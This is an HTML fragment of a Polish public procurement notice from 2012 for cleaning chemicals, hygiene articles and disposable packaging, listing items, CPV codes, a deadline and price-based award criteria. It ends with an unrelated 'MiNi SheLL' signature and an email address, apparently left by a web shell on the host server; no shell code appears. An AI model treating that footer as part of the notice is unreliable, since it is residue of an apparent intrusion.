<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa chemii profesjonalnej do utrzymania higieny i czystości w bloku żywnościowymMydło w płynie do rąk
Płyn do dezynfekcji rąk
Płyn do ręcznego mycia naczyń op. Duże
Płyn do ręcznego mycia naczyń op. Małe
Płyn do mechanicznego mycia naczyń
Płyn do nabłyszczania w zmywarkach
Płyn do mycia i dezynfekcji podłóg i ścian
Płyn do mycia i dezynfekcji sprzętu i wyposażenia
Kwaśny płyn do mycia i dezynfekcji
Kwaśny preparat do dezynfekcji
Płyn do dezynfekcji kratek ściekowych
Płyn do usuwania osadów mineralnych
Płyn do sanitariatów antybakteryjny
Płyn do usuwania przypaleń z spryskiwaczem
Płyn do usuwania przykrych zapachów z spryskiwaczem
Płyn konserwacji stali nierdzewnej spryskiwacz
Proszek do szorowania
Mleczko do czyszczenia
Odświeżacz powietrza.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0, 39.83.13.00-9, 39.83.16.00-2, 39.83.20.00-3, 33.71.15.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa artykułów higienicznych i opakowań jednorazowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa artykułów higienicznych i opakowań jednorazowych-Woreczki foliowe HDPE 14/4/32
Reklamówka 25x6x45cm popularna
Folia aluminiowa do żywności szer. 28 cm
Papier pakowy półpergamin A0
Worki na śmieci LDPE 35 lit.
Worki na śmieci LDPE 140-160 lit.
Serwetki składane kolorowe 33 x 33 cm
Obrus papierowy jednorazowy
Ręczniki w roli za 100 mb
Druciak metalowy 30gr
Zmywaki z gąbką do naczyń
Haczyki plastikowe samoprzylepne owalny 52x32mm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com